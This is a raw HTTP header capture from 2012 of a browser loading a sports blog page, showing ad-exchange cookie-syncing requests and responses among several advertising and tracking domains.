Date: Mon, 19 Nov 2012 04:17:43 GMT
Transfer-Encoding: chunked
Connection: close
Location: http://ce.lijit.com/merge?pid=2&amp;3pid=DAB99AEE3491F2DEC8F6049C9413ED9C
P3P: policyref=&quot;http://www.simplifi.com/w3c/Policies.xml&quot;, CP=&quot;ADMa DEVa PSAa PSDa OUR IND DSP NON COR&quot;
GET /do-association-set?ctxweb&can=10 HTTP/1.1

Host: matcher-cwb.bidder7.mookie1.com
GET /do-association-set?ctxweb&amp;can=10 HTTP/1.1

User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20101203 Firefox/3.6.13
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive
Referer: http://bh.contextweb.com/bh/visitormatch?tag=66902&amp;pid=520266
Cookie: id=4612319699895321067; mdata=1|4612319699895321067|1353298663
HTTP/1.1 302 Found

Content-Type: text/html; charset=UTF-8
Date: Mon, 19 Nov 2012 04:17:43 GMT
Server: Apache/2.2.3 (Red Hat)
Location: http://bh.contextweb.com/bh/rtset?do=add&amp;pid=536088&amp;ev=4612319699895321067&amp;rurl=http://matcher-cwb.bidder7.mookie1.com/do-association?return=ctxweb%26can=10
Cache-Control: no-cache,no-store,private
Pragma: no-cache
Expires: Fri, 30 Oct 1998 14:19:41 GMT
P3P: CP=&quot;NON NID PSAa PSDa OUR IND UNI COM NAV STA&quot;,policyref=&quot;/w3c/p3p.xml&quot;
Content-Length: 0
Keep-Alive: timeout=1, max=878
Connection: Keep-Alive
GET /sync/img?mt_exid=17&redirect=http%3A%2F%2Fce.lijit.com%2Fmerge%3Fpid%3D3%263pid%3D%5BMM_UUID%5D HTTP/1.1

Host: sync.mathtag.com
GET /sync/img?mt_exid=17&amp;redirect=http%3A%2F%2Fce.lijit.com%2Fmerge%3Fpid%3D3%263pid%3D%5BMM_UUID%5D HTTP/1.1

User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20101203 Firefox/3.6.13
Accept: image/png,image/*;q=0.8,*/*;q=0.5
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive
Referer: http://gslbeacon.lijit.com/beacon?viewId=1353298662674c203f9f9ae4d&amp;rand=1353298662674&amp;uri=http://www.lijit.com/users/bloguin/1&amp;informer=6280786&amp;type=fpads&amp;loc=http%3A%2F%2Ffenwaywest.com%2Fmedia%2Findex.php&amp;ifr=1&amp;v=1.0&amp;rr=http%3A%2F%2Ffenwaywest.com%2Fmedia%2Findex.php
Cookie: uuid=50a9b2e2-9d68-d676-6901-3c5fafca2592; mt_mop=11:1353298658|17:1353298662
HTTP/1.1 302 Found

Content-Type: image/gif
Date: Mon, 19 Nov 2012 04:17:43 GMT
Content-Length: 0
Connection: keep-alive
Server: mt2/2.6.2.2465 Sep 24 2012 22:21:34 zrh-pixel-x2 pid 0x15b2 5554
Cache-Control: no-cache
P3P: CP=&quot;NOI DSP COR NID CURa ADMa DEVa PSAa PSDa OUR BUS COM INT OTC PUR STA&quot;
Set-Cookie: mt_mop=11:1353298658|17:1353298663; domain=.mathtag.com; path=/; expires=Wed, 19-Dec-2012 04:17:43 GMT
Location: http://ce.lijit.com/merge?pid=3&amp;3pid=50a9b2e2-9d68-d676-6901-3c5fafca2592
GET /notify/js?exch=ctw&id=5aW95q2jLzEvTlhWNmFtWnBiVXRoTUhwS1FXRlhNazVFWjNWeVp3L05UQmhPV0l5WlRJdE9XUTJPQzFrTmpjMkxUWTVNREV0TTJNMVptRm1ZMkV5TlRreS8xNzA5NTg2OTgxNzA5NDQ1MDk1LzIzOTUyNy8xNjM0ODEvMTEvY1pPVUl2YUJmVUZqS3JnVnVBUzFvQXNoellKUTdsTVZ5aXpQMFlGcTFhUS8/yAkpis7FiubNE_63G83hm7pGm4o&sid=163481&cid=239527&price=UKmy5wADtTi2PVP-Z1JpJcLB2RHx8xtZnCLQjA HTTP/1.1

Host: bidder.mathtag.com
GET /notify/js?exch=ctw&amp;id=5aW95q2jLzEvTlhWNmFtWnBiVXRoTUhwS1FXRlhNazVFWjNWeVp3L05UQmhPV0l5WlRJdE9XUTJPQzFrTmpjMkxUWTVNREV0TTJNMVptRm1ZMkV5TlRreS8xNzA5NTg2OTgxNzA5NDQ1MDk1LzIzOTUyNy8xNjM0ODEvMTEvY1pPVUl2YUJmVUZqS3JnVnVBUzFvQXNoellKUTdsTVZ5aXpQMFlGcTFhUS8/yAkpis7FiubNE_63G83hm7pGm4o&amp;sid=163481&amp;cid=239527&amp;price=UKmy5wADtTi2PVP-Z1JpJcLB2RHx8xtZnCLQjA HTTP/1.1

User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20101203 Firefox/3.6.13
Accept: */*
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive
Referer: http://fenwaywest.com/media/index.php
Cookie: uuid=50a9b2e2-9d68-d676-6901-3c5fafca2592; mt_mop=11:1353298658|17:1353298662
HTTP/1.1 200 OK

Content-Type: application/x-javascript
Date: Mon, 19 Nov 2012 04:17:43 GMT
P3P: CP=&quot;NOI DSP COR NID CURa ADMa DEVa PSAa PSDa OUR BUS COM INT OTC PUR STA&quot;
Set-Cookie: mt_mop=11:1353298658|17:1353298662|4:1353298663|10010:1353298663; domain=.mathtag.com; path=/; expires=Thu, 19 Nov 2015 04:17:43 GMT
Last-Modified: Mon, 19 Nov 2012 04:17:42 GMT
x-mm-dbg: won
Content-Length: 1676
x-mm-host: zrh-bidder-x19, ord-bidder-x18
Server: MMBD/3.18.2
Connection: keep-alive
GET /bh/rtset?do=add&pid=537085&ev=DAB99AEE3491F2DEC8F6049C9413ED9C HTTP/1.1

Host: bh.contextweb.com
GET /bh/rtset?do=add&amp;pid=537085&amp;ev=DAB99AEE3491F2DEC8F6049C9413ED9C HTTP/1.1

User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20101203 Firefox/3.6.13
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive
Referer: http://bh.contextweb.com/bh/visitormatch?tag=66902&amp;pid=520266
Cookie: C2W4=3-a1bVT-F6HJlfJrS7NCZfQtTK0a0zp6fORVU9k057LWIC9-6ST6pzQ; cw=cw; 66902_160X600__POSUNKNOWNXUNKNOWN=1353298784332; V=Cp3qDslEoSFB; vf=3; wf=0; pb_rtb_ev=2-535461.4608069794370173199.0.0.1353298661541|530731..0.0.1353298658421|531399..0.0.1353298658421|530912..0.0.1353298658421|535495..0.0.1353298658421|540281..0.0.1353298658421|534301.71a3945c-1742-4347-b6e7-48a1509b5fa0.0.0.1353298663243|535393..0.0.1353298658421|541254..0.0.1353298658421|537085..0.0.1353298658421|543921..0.0.1353298658421|536088..0.0.1353298658421|538569.db273952-68a4-4097-8df2-7d98b16e5711.0.0.1353298658835|545979.5858721859426781856.0.0.1353298661823|531292.BM-00000003256334509.0.0.1353298663022|543604..0.0.1353298658421|535039..0.0.1353298658421|530739.50a9b2e2-9d68-d676-6901-3c5fafca2592.0.0.1353298661043|537583..0.0.1353298658421|547259..0.0.1353298658421; 66901_300X250__POSUNKNOWNXUNKNOWN=1353298786770
HTTP/1.1 200 OK

Content-Type: image/gif;charset=ISO-8859-1
Cache-Control: private, max-age=0, no-cache, no-store
Content-Language: en-US
CW-Server: ip-10-79-5-121
Date: Mon, 19 Nov 2012 04:17:42 GMT
Expires: -1
P3P: policyref=&quot;/bh/w3c/p3p.xml&quot;, CP=&quot;NOI DSP COR NID CURa DEVa PSAa OUR BUS COM NAV INT&quot;
Server: GlassFish v3
Set-Cookie: V=Cp3qDslEoSFB; Domain=.contextweb.com; Expires=Thu, 14-Nov-2013 04:17:43 GMT; Path=/ pb_rtb_ev=2-530731..0.0.1353298658421|535461.4608069794370173199.0.0.1353298661541|531399..0.0.1353298658421|530912..0.0.1353298658421|535495..0.0.1353298658421|540281..0.0.1353298658421|534301.71a3945c-1742-4347-b6e7-48a1509b5fa0.0.0.1353298663243|535393..0.0.1353298658421|537085.DAB99AEE3491F2DEC8F6049C9413ED9C.0.0.1353298663758|541254..0.0.1353298658421|536088..0.0.1353298658421|543921..0.0.1353298658421|538569.db273952-68a4-4097-8df2-7d98b16e5711.0.0.1353298658835|545979.5858721859426781856.0.0.1353298661823|531292.BM-00000003256334509.0.0.1353298663022|535039..0.0.1353298658421|543604..0.0.1353298658421|530739.50a9b2e2-9d68-d676-6901-3c5fafca2592.0.0.1353298661043|537583..0.0.1353298658421|547259..0.0.1353298658421; Domain=.contextweb.com; Expires=Tue, 19-Nov-2013 04:17:43 GMT; Path=/
Content-Length: 49
Connection: keep-alive
GET /rsp/cc?min_age=2&rurl=http://network.realmedia.com/RealMedia/ads/adstream.cap?c=mooker%26e=7d%26va=[MOOKIE]_[MOOKIE_AGE] HTTP/1.1

Host: t.mookie1.com
GET /rsp/cc?min_age=2&amp;rurl=http://network.realmedia.com/RealMedia/ads/adstream.cap?c=mooker%26e=7d%26va=[MOOKIE]_[MOOKIE_AGE] HTTP/1.1

User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20101203 Firefox/3.6.13
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive
Referer: http://network.realmedia.com/RealMedia/ads/adstream_sx.ads/bloguin/ros/300x250/sx/ss/a@x15
Cookie: id=422312932971349; mdata=1|422312932971349|1353298663; OAX=lj71PFCpsucACOO/
HTTP/1.1 200 OK

Content-Type: text/html; charset=UTF-8
Date: Mon, 19 Nov 2012 04:17:43 GMT
Server: Apache/2.0.52 (Red Hat) mod_perl/1.99_16 Perl/v5.8.5 mod_python/3.1.3 Python/2.3.4 mod_ssl/2.0.52 OpenSSL/0.9.7a
ntCoent-Length: 13
Connection: close
X-Pad: avoid browser bug
Cache-Control: private
Content-Encoding: gzip
Content-Length: 29
GET /PropertyAssets/ArticleImages/eb8aaa6b7c12c9700505be31e727a952_72e1255182e32fecbb0f2af51f268f4f.PNG HTTP/1.1

Host: api.content.ad

User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20101203 Firefox/3.6.13
Accept: image/png,image/*;q=0.8,*/*;q=0.5
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive
Referer: http://fenwaywest.com/media/index.php
Cookie: ASP.NET_SessionId=wjzyzr31rdtsq4rrlm3pacbw; urlHistory=388817:1,387812:1,12084:1,106115:1
HTTP/1.1 200 OK

Content-Type: image/png
Last-Modified: Sun, 18 Nov 2012 08:00:05 GMT
Accept-Ranges: bytes
Etag: &quot;a8f33fb862c5cd1:0&quot;
Server: Microsoft-IIS/7.0
X-Powered-By: ASP.NET
Date: Mon, 19 Nov 2012 04:16:19 GMT
Content-Length: 33406
GET /merge?pid=10&3pid=638103774108863402&forward= HTTP/1.1

Host: ce.lijit.com
GET /merge?pid=10&amp;3pid=638103774108863402&amp;forward= HTTP/1.1

User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20101203 Firefox/3.6.13
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive
Referer: http://gslbeacon.lijit.com/beacon?viewId=1353298662674c203f9f9ae4d&amp;rand=1353298662674&amp;uri=http://www.lijit.com/users/bloguin/1&amp;informer=6280786&amp;type=fpads&amp;loc=http%3A%2F%2Ffenwaywest.com%2Fmedia%2Findex.php&amp;ifr=1&amp;v=1.0&amp;rr=http%3A%2F%2Ffenwaywest.com%2Fmedia%2Findex.php
Cookie: ljt_reader=193e6b4996885915ffee71e118a270a4; ljtrtb=eJwVy8ENxDAIBdFeOK8lwMCH7cYW3iZW6T3J%2Bc38SehLFpwchbIJFkypog%2FJfMh51dYTZrncuRs40NOvv2tvxSzXEblsGBdG9k8HunJLHMeTXTeqZxfa
HTTP/1.1 302 Found

Content-Type: text/html
Date: Mon, 19 Nov 2012 04:17:43 GMT
Server: Apache/2.2.22 (Ubuntu)
X-Powered-By: PHP/5.3.10-1ubuntu3.4
Pragma: no-cache
Cache-Control: private, max-age=0, no-cache, max-age=0, must-revalidate
P3P: CP=&quot;CUR ADM OUR NOR STA NID&quot;
Set-Cookie: ljtrtb=eJwVy8sNQjEMBdFevCaSf%2FG16SaRQxOI3slbz5kvCb3Jg5OjUG5ggUkVvUjspsmrtp5wzzUndwMHevrpz9pbYTV1RC4fzoWR%2FdGBrtwSZ%2BKya%2FnasBQ2wIUzw5yVfn9QpBzQ; expires=Tue, 19-Nov-2013 04:17:43 GMT; path=/; domain=.lijit.com
Expires: Mon, 19 Nov 2012 04:17:43 GMT
Vary: Accept-Encoding
Content-Encoding: gzip
Content-Length: 20
Connection: close
GET /bh/rtset?do=add&pid=536088&ev=4612319699895321067&rurl=http://matcher-cwb.bidder7.mookie1.com/do-association?return=ctxweb%26can=10 HTTP/1.1

Host: bh.contextweb.com
GET /bh/rtset?do=add&amp;pid=536088&amp;ev=4612319699895321067&amp;rurl=http://matcher-cwb.bidder7.mookie1.com/do-association?return=ctxweb%26can=10 HTTP/1.1

User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20101203 Firefox/3.6.13
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive
Referer: http://bh.contextweb.com/bh/visitormatch?tag=66902&amp;pid=520266
Cookie: C2W4=3-a1bVT-F6HJlfJrS7NCZfQtTK0a0zp6fORVU9k057LWIC9-6ST6pzQ; cw=cw; 66902_160X600__POSUNKNOWNXUNKNOWN=1353298784332; V=Cp3qDslEoSFB; vf=3; wf=0; pb_rtb_ev=2-535461.4608069794370173199.0.0.1353298661541|530731..0.0.1353298658421|531399..0.0.1353298658421|530912..0.0.1353298658421|535495..0.0.1353298658421|540281..0.0.1353298658421|534301.71a3945c-1742-4347-b6e7-48a1509b5fa0.0.0.1353298663243|535393..0.0.1353298658421|541254..0.0.1353298658421|537085..0.0.1353298658421|543921..0.0.1353298658421|536088..0.0.1353298658421|538569.db273952-68a4-4097-8df2-7d98b16e5711.0.0.1353298658835|545979.5858721859426781856.0.0.1353298661823|531292.BM-00000003256334509.0.0.1353298663022|543604..0.0.1353298658421|535039..0.0.1353298658421|530739.50a9b2e2-9d68-d676-6901-3c5fafca2592.0.0.1353298661043|537583..0.0.1353298658421|547259..0.0.1353298658421; 66901_300X250__POSUNKNOWNXUNKNOWN=1353298786770
HTTP/1.1 302 Moved Temporarily

Content-Type: text/html;charset=ISO-8859-1
Cache-Control: private, max-age=0, no-cache, no-store
Content-Language: en-US
CW-Server: ip-10-98-119-224
Date: Mon, 19 Nov 2012 04:17:43 GMT
Expires: -1
Location: http://matcher-cwb.bidder7.mookie1.com/do-association?return=ctxweb&amp;can=10
P3P: policyref=&quot;/bh/w3c/p3p.xml&quot;, CP=&quot;NOI DSP COR NID CURa DEVa PSAa OUR BUS COM NAV INT&quot;
Server: GlassFish v3
Set-Cookie: V=Cp3qDslEoSFB; Domain=.contextweb.com; Expires=Thu, 14-Nov-2013 04:17:43 GMT; Path=/ pb_rtb_ev=2-530731..0.0.1353298658421|535461.4608069794370173199.0.0.1353298661541|531399..0.0.1353298658421|530912..0.0.1353298658421|535495..0.0.1353298658421|540281..0.0.1353298658421|534301.71a3945c-1742-4347-b6e7-48a1509b5fa0.0.0.1353298663243|535393..0.0.1353298658421|537085..0.0.1353298658421|541254..0.0.1353298658421|536088.4612319699895321067.0.0.1353298663958|543921..0.0.1353298658421|538569.db273952-68a4-4097-8df2-7d98b16e5711.0.0.1353298658835|545979.5858721859426781856.0.0.1353298661823|531292.BM-00000003256334509.0.0.1353298663022|535039..0.0.1353298658421|543604..0.0.1353298658421|530739.50a9b2e2-9d68-d676-6901-3c5fafca2592.0.0.1353298661043|537583..0.0.1353298658421|547259..0.0.1353298658421; Domain=.contextweb.com; Expires=Tue, 19-Nov-2013 04:17:43 GMT; Path=/
Content-Length: 228
Connection: keep-alive
GET /m/lj?r=1353298663538 HTTP/1.1

Host: lj.d.chango.com

User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20101203 Firefox/3.6.13
Accept: image/png,image/*;q=0.8,*/*;q=0.5
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive
Referer: http://gslbeacon.lijit.com/beacon?viewId=1353298662674c203f9f9ae4d&amp;rand=1353298662674&amp;uri=http://www.lijit.com/users/bloguin/1&amp;informer=6280786&amp;type=fpads&amp;loc=http%3A%2F%2Ffenwaywest.com%2Fmedia%2Findex.php&amp;ifr=1&amp;v=1.0&amp;rr=http%3A%2F%2Ffenwaywest.com%2Fmedia%2Findex.php
Cookie: _t=100b3eb8-3200-11e2-934d-00259036ff0a
HTTP/1.1 200 OK

Content-Type: image/gif
Content-Length: 35
Server: RTB
Etag: &quot;0f4e929dd5bb2564f7ab9c76338e04e292a42ace&quot;
Pragma: no-cache
Cache-Control: no-cache, no-store, max-age=0, must-revalidate
P3P: policyref=&quot;http://as.chango.com/static/w3c/p3p.xml&quot;, CP=&quot;NOI DSP COR DEVa TAIa OUR BUS UNI&quot;
Set-Cookie: _t=100b3eb8-3200-11e2-934d-00259036ff0a; Domain=chango.com; expires=Thu, 17 Nov 2022 04:17:43 GMT; Path=/
Connection: close
GET /00/72/26/adserv_2672.js?ad_size=300x250,300x600&referrer=http%3A//ad.yieldmanager.com/iframe3%3FbV5bEg73CQAQ7oEAAAAAAPL-IAAAAAAAAgAAAAIAAAAAAP8AAAACBnhSEwAAAAAAmGQrAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAACBFgUAAAAAAAIAAgAAgD8AmpmZmZmZ4T-amZmZmZnhP5qZmZmZmeE.mpmZmZmZ4T8AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAB0nl0zZ5fyDJK-L4dTr-5Wz7Lp7cDnX.5.rk.vAAAAAA%3D%3D%2C%2Chttp%253A%252F%252Fakamai-media.contextweb.com%252Fcreatives%252Fbackuptags%252F520266%252Fbdb502a4-5d70-42c0-a7d9-604184e4e18elijit_box..html%2CZ%253D300x250%2526_salt%253D115542970%2526anmember%253D514%2526anprice%253D100%2526r%253D0%2526s%253D653070%2C106c775a-3200-11e2-909d-b32498808ef9%2C1353298663146&nsafe=general&reftype=adnetwork&disp=iframe&tmiv=1&tcb=0.9199917099665583 HTTP/1.1

Host: uat-net.technoratimedia.com
GET /00/72/26/adserv_2672.js?ad_size=300x250,300x600&amp;referrer=http%3A//ad.yieldmanager.com/iframe3%3FbV5bEg73CQAQ7oEAAAAAAPL-IAAAAAAAAgAAAAIAAAAAAP8AAAACBnhSEwAAAAAAmGQrAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAACBFgUAAAAAAAIAAgAAgD8AmpmZmZmZ4T-amZmZmZnhP5qZmZmZmeE.mpmZmZmZ4T8AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAB0nl0zZ5fyDJK-L4dTr-5Wz7Lp7cDnX.5.rk.vAAAAAA%3D%3D%2C%2Chttp%253A%252F%252Fakamai-media.contextweb.com%252Fcreatives%252Fbackuptags%252F520266%252Fbdb502a4-5d70-42c0-a7d9-604184e4e18elijit_box..html%2CZ%253D300x250%2526_salt%253D115542970%2526anmember%253D514%2526anprice%253D100%2526r%253D0%2526s%253D653070%2C106c775a-3200-11e2-909d-b32498808ef9%2C1353298663146&amp;nsafe=general&amp;reftype=adnetwork&amp;disp=iframe&amp;tmiv=1&amp;tcb=0.9199917099665583 HTTP/1.1

User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20101203 Firefox/3.6.13
Accept: */*
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive
Referer: http://r1.ace.advertising.com/site=782467/size=300250/u=2/bnum=82574062/wkhr=29/hr=5/hl=1/scres=5/swh=1176x885/tile=1/f=2/r=1/optn=1/fv=10/aolexp=0/tags=1/dref=http%253A%252F%252Fakamai-media.contextweb.com%252Fcreatives%252FBackupTags%252F520266%252Fbdb502a4-5d70-42c0-a7d9-604184e4e18eLijit_Box..html
Cookie: tads_uid=839656B2FC05473098555B1265D9DDB9; tads_uid_cd=20121118201742-0800; tads_zora=1|15663|1; tads_au=&quot;1|CAE=&quot;
HTTP/1.1 200 OK

Content-Type: application/x-javascript
Set-Cookie: tads_zora=1|15663|2; Path=/; Domain=.technoratimedia.com
tads_au=&quot;1|CAE=&quot;; Expires=Sat, 18-Nov-17 04:17:43 GMT; Path=/; Domain=.technoratimedia.com
Connection: Keep-Alive
Content-Encoding: gzip
Content-Length: 3115
X-Via: CN-5000
GET /cms/cc?min_age=2&rurl=http://ib.adnxs.com/mapuid?member=1471%26user=[MOOKIE] HTTP/1.1

Host: t.mookie1.com
GET /cms/cc?min_age=2&amp;rurl=http://ib.adnxs.com/mapuid?member=1471%26user=[MOOKIE] HTTP/1.1

User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20101203 Firefox/3.6.13
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive
Referer: http://network.realmedia.com/RealMedia/ads/adstream_sx.ads/bloguin/ros/300x250/sx/ss/a@x15
Cookie: id=422312932908019; mdata=1|422312932908019|1353298663; OAX=4rS/HFCpsucACSed
HTTP/1.1 200 OK

Content-Type: text/html; charset=UTF-8
Date: Mon, 19 Nov 2012 04:17:43 GMT
Server: Apache/2.0.52 (Red Hat)
Cteonnt-Length: 13
Connection: close
Cache-Control: private
Content-Encoding: gzip
Content-Length: 29
GET /merge?pid=12&3pid=5858721859426781856 HTTP/1.1

Host: ce.lijit.com
GET /merge?pid=12&amp;3pid=5858721859426781856 HTTP/1.1

User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20101203 Firefox/3.6.13
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive
Referer: http://gslbeacon.lijit.com/beacon?viewId=1353298662674c203f9f9ae4d&amp;rand=1353298662674&amp;uri=http://www.lijit.com/users/bloguin/1&amp;informer=6280786&amp;type=fpads&amp;loc=http%3A%2F%2Ffenwaywest.com%2Fmedia%2Findex.php&amp;ifr=1&amp;v=1.0&amp;rr=http%3A%2F%2Ffenwaywest.com%2Fmedia%2Findex.php
Cookie: ljt_reader=193e6b4996885915ffee71e118a270a4; ljtrtb=eJwVy8ENxDAIBdFeOK8lwMCH7cYW3iZW6T3J%2Bc38SehLFpwchbIJFkypog%2FJfMh51dYTZrncuRs40NOvv2tvxSzXEblsGBdG9k8HunJLHMeTXTeqZxfa
HTTP/1.1 200 OK

Content-Type: image/gif
Date: Mon, 19 Nov 2012 04:17:43 GMT
Server: Apache/2.2.22 (Ubuntu)
X-Powered-By: PHP/5.3.10-1ubuntu3.4
Pragma: no-cache
Cache-Control: private, max-age=0, no-cache, max-age=86400, must-revalidate
P3P: CP=&quot;CUR ADM OUR NOR STA NID&quot;
Set-Cookie: ljtrtb=eJwVjMENAzEIBHvhHUuAgYV0cxZOE1F6j%2F1baWb2S0JvsuDkKJRNsGBKFb1I5kHOTy3dYZaPO3cDG7r78pv2UsxyHZGPDePCyP7oQFcuie042nH1fqUnVNLLNJBnBP3%2BbvAdJA%3D%3D; expires=Tue, 19-Nov-2013 04:17:43 GMT; path=/; domain=.lijit.com
Content-Length: 43
Expires: Tue, 20 Nov 2012 04:17:43 GMT
Connection: close
GET /merge?pid=3&3pid=50a9b2e2-9d68-d676-6901-3c5fafca2592 HTTP/1.1

Host: ce.lijit.com
GET /merge?pid=3&amp;3pid=50a9b2e2-9d68-d676-6901-3c5fafca2592 HTTP/1.1

User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20101203 Firefox/3.6.13
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive
Referer: http://gslbeacon.lijit.com/beacon?viewId=1353298662674c203f9f9ae4d&amp;rand=1353298662674&amp;uri=http://www.lijit.com/users/bloguin/1&amp;informer=6280786&amp;type=fpads&amp;loc=http%3A%2F%2Ffenwaywest.com%2Fmedia%2Findex.php&amp;ifr=1&amp;v=1.0&amp;rr=http%3A%2F%2Ffenwaywest.com%2Fmedia%2Findex.php
Cookie: ljt_reader=193e6b4996885915ffee71e118a270a4; ljtrtb=eJwVy8ENxDAIBdFeOK8lwMCH7cYW3iZW6T3J%2Bc38SehLFpwchbIJFkypog%2FJfMh51dYTZrncuRs40NOvv2tvxSzXEblsGBdG9k8HunJLHMeTXTeqZxfa
HTTP/1.1 200 OK

Content-Type: image/gif
Date: Mon, 19 Nov 2012 04:17:43 GMT
Server: Apache/2.2.22 (Ubuntu)
X-Powered-By: PHP/5.3.10-1ubuntu3.4
Pragma: no-cache
Cache-Control: private, max-age=0, no-cache, max-age=86400, must-revalidate
P3P: CP=&quot;CUR ADM OUR NOR STA NID&quot;
Set-Cookie: ljtrtb=eJxNjMkRwzAIAHvhbWYAcaYbychNeNJ77F%2Fee9zA8AF1SvKK0hHEMbgKDuDxIKNZS7ar5jSj7ogdsvvlb9pLYpQJek5FpQrMvgSjKxf7tni0A%2F5WgtWe2B6OXsQ4TrvmdU6xEvj%2BAH0GIkk%3D; expires=Tue, 19-Nov-2013 04:17:43 GMT; path=/; domain=.lijit.com
Content-Length: 43
Expires: Tue, 20 Nov 2012 04:17:43 GMT
Connection: close
GET /merge?pid=2&3pid=DAB99AEE3491F2DEC8F6049C9413ED9C HTTP/1.1

Host: ce.lijit.com
GET /merge?pid=2&amp;3pid=DAB99AEE3491F2DEC8F6049C9413ED9C HTTP/1.1

User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20101203 Firefox/3.6.13
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive
Referer: http://gslbeacon.lijit.com/beacon?viewId=1353298662674c203f9f9ae4d&amp;rand=1353298662674&amp;uri=http://www.lijit.com/users/bloguin/1&amp;informer=6280786&amp;type=fpads&amp;loc=http%3A%2F%2Ffenwaywest.com%2Fmedia%2Findex.php&amp;ifr=1&amp;v=1.0&amp;rr=http%3A%2F%2Ffenwaywest.com%2Fmedia%2Findex.php
Cookie: ljt_reader=193e6b4996885915ffee71e118a270a4; ljtrtb=eJwVy8ENxDAIBdFeOK8lwMCH7cYW3iZW6T3J%2Bc38SehLFpwchbIJFkypog%2FJfMh51dYTZrncuRs40NOvv2tvxSzXEblsGBdG9k8HunJLHMeTXTeqZxfa
HTTP/1.1 200 OK

Content-Type: image/gif
Date: Mon, 19 Nov 2012 04:17:43 GMT
Server: Apache/2.2.22 (Ubuntu)
X-Powered-By: PHP/5.3.10-1ubuntu3.4
Pragma: no-cache
Cache-Control: private, max-age=0, no-cache, max-age=86400, must-revalidate
P3P: CP=&quot;CUR ADM OUR NOR STA NID&quot;
